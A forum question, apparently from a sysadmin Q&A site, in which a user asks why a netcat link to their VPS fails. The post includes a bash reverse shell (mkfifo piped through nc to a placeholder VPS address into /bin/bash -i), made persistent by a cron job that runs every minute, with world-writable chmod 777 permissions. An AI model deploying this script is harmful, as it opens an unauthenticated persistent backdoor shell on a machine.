# Can't connect to nc on VPS Please review

Tags: ssh, vps, nc

I've set up a connection on my own personal machine, using this code:

```
#!/bin/bash

n=$(ps aux | grep -o [1]234)

if [[ $n = "" ]]; then
        mkfifo f
        nc VPS_IP_ADDRESS_HERE 1234 < f | /bin/bash -i > f 2>&1
fi
```

I want to connect to it from another different machine on a different network, so I bought a VPS! I replaced the text `VPS_IP_ADDRESS_HERE` with the IP address of my VPS. Then I made sure to give the script permissions with `chmod 777 /etc/whatever`. I also did a crontab to make sure the bash script runs every minute and set it to the following code:

```
* * * * * /etc/whatever
```

Now on a different machine I SSH into the VPS and did the command `nc -l -p 1234` but no connections happened or anything! Please help!

Comment: Check your logs.

Comment: @MichaelHampton on what?

Comment: Run the commands from your script manually on your vps and check what happens